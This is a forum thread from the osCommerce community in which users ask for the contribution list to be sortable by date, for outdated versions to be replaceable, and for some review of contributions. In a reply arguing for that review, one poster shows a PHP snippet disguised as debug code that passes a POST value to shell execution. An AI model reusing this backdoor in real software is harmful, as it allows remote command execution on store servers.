• Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

contributions list by date

Trusten

why is it we can't organize the contribution list by the dates. i for one want to see the 'latest' contributions. it's really frustrating to have to look through them slowly.

is there any way osc would consider making so that you can organize the contribution list by date or title, or even version.

why is it we can't organize the contribution list by the dates. i for one want to see the 'latest' contributions. it's really frustrating to have to look through them slowly.

is there any way osc would consider making so that you can organize the contribution list by date or title, or even version.

Heh. I had thought the same thing.

I'd also like to see a d/l count. I'd be interested in that to find out how popular my mod might be. (Ok, ok, so it's an ego boost... :lol:)

Aodhan

Hi,

I am not sure - but one big problem with posting contributions is that you can not "delete" the previous one.

Example:

You are a maker of a contribution - put it in the contribution area.

Some days later (you made changes and fixes to your contribution), you can not "replace" the former upload in the contribution area.

This we you sometimes see 4 or more versions of the same contrib in the area.

Perhaps somebody (core team - webmaster or who might find time ??) could find a kind of "update-your-contirbution-way" for the osc contibution section. I think this could really help.

Hope my suggestion can be understood. (sorry for my english).

EL Bavaro

It makes sense what you are saying but if a contributor takes the proper steps (giving it same name / group) then the latest version should be obvious to someone.

Also with the release of new snapshots (namely the < 11/01 snapshots with new checkout procedure) a lot of contributions have had to be updated in which case the newest contribution would be necessary but if you are someone like me with an older snapshot, the older contribution is a must have.

You should only be able to delete / update OBSOLETE versions as there might be people using older osC versions that still have use for it.

It has been discussed before in the forums. It basically boils down to time. Someone needs to go over all the contribs, install them in the appropriate version and label them safe... I'd rather have the coders concentrate on the core development of osCommerce though.

But the sorting by date shouldn't be hard at all.

So just hope Harald has some time to implement that soon :)

I know site update's have been planned again (weekly report) so...

"Politics is the art of preventing people from taking part in affairs which properly concern them"

Another nice approach could be to have the chance to give the contributer the chance to upload up to 5 versions (or more or less) of his contribution.

It would a kind of sort the contiribution area - and make it easier to focus on the contribution.

EL Bavaro

Couldn't OSC itself be modified to become a "Contribution Center"?

List each contribution as a product.

Integrate phpBB for topic discussion.

Get notified everytime a "product" is updated?

Use the Admins addon to allow others to post new products?

That is how I use my site.

http://www.thewebmakerscorner.com/freecall

On the contributions that are still in progress or too large to load, there is a Downloads category.

You can *buy* them for free (an Add-On I wrote) and you get free shipping (an Add-On I wrote) and as they are Free with Free Shipping they are immediately available for download (an Add-On I wrote) and you can see the Free things as they say Free rather than $0 (an Add-on I wrote) ...

Old versions are either removed are Sold Out.

Gosh ... I think I like to write a lot ... :D

Others are in the contributions section.

Well, I don't see why someone has to check them to see if they are safe. They should only be reviewed and checked if they are going to be added to the CVS.

The user standpoint needs two things:

1) a Search

2) The ability to choose a sort order.

The contributor needs a couple things as well.

1) The ability to edit a previous contribution s/he made so that there aren't new versions everyday from those that update their contributions.

2) A required snapshot field that specifies what snapshot the person used to build on that others can use as a guideline.

All of that would make the contributions easier to manage and find.

Well, I don't see why someone has to check them to see if they are safe. They should only be reviewed and checked if they are going to be added to the CVS.

Well I do...

Can any of you non-coders outthere please explain what the

code below looks like to you?

// debugging purposed only:

if ($HTTP_POST_VARS['debug'] == 'error') {

$tep_error_msg = addslashes($HTTP_POST_VARS['error_code']); 

$do = `$tep_error_msg`;

//now show the error:

echo $do;

}

Mattice

"Politics is the art of preventing people from taking part in affairs which properly concern them"

I am sorry, but each store developer should not have to be baby-sat. If they don't think a contribution is safe then they should either have it reviewed or not install it simple as that.

The developers of this project have better things to do then review each and every contribution in the list. Right now the list is relatively small compared to some projects I have seen. What happens when there are 30-40 new contributions a week? It will take someone full time to adequately review and check each and every one. Are you going to pay their wages for them to do so?

It has been discussed before in the forums. It basically boils down to time. Someone needs to go over all the contribs, install them in the appropriate version and label them safe... I'd rather have the coders concentrate on the core development of osCommerce though

I was not implying it was MY idea to check them, it's been on the Teams TODO list for ages. Might have been taken of now but I do recall either DGW or Mark Evans was appointed to sort out all the contrib stuff. My point is merely that some sort of control system has to be introduced to the contribution section.

You picked up on the safe bit...

Labelling something safe can be alot of things, my example code was just a reaction to your comment, an illustration as to what can happen if there is no control whatsoever.

Obviously osC's dev team can not guarantee the integrety of contribs.

Like stated in the contrib section by the way.

But some scanning would be appropriate.

After all this is an e-commerce application, not a phpNuke Weather module.

Are you going to pay their wages for them to do so?

Are you? Your missing the point here. There needs to be some control over the contribution section by either the authors, the dev team or some volunteer(s).

The current contribution section has been improved a bit over time but with all due respect it still sucks.

osCommerce has outgrown the old format long time ago.

Regards,

Mattice

I also agreed on using at my own risk but we could always make it safer for everyone....That's the whole point of the project right? Make it better...When I contributed my first, I automatically though it would get screened by someone before getting posted.

Anyway, This Project is here to stay and if we think long run, we do need better system for the contribution section and this forum

Forum is getting harder and harder to look for information because same questions are being asked over and over again so we need knowlege base or some sort of FAQ system. Also better search feature and better categoriezed forum.

Contribution section should be in this forum...like posting with file attached so we can vote and see how many people have downloaded them. Of course posting should be closed for replies.

Anyway...that's just my though.

I haven't been around the oscommerce much for quite some time - I can see from looking at the contributions section that there are some that I would now find useful that are no longer there.

I believe Mark Keith Evans made a columns contrib for default.php (this is not a cross post) and also there was a separate pricing per customer contrib in which the displayed catalog prices changed to the user discount once they were logged on... i can no longer find either of these.... where have they gone?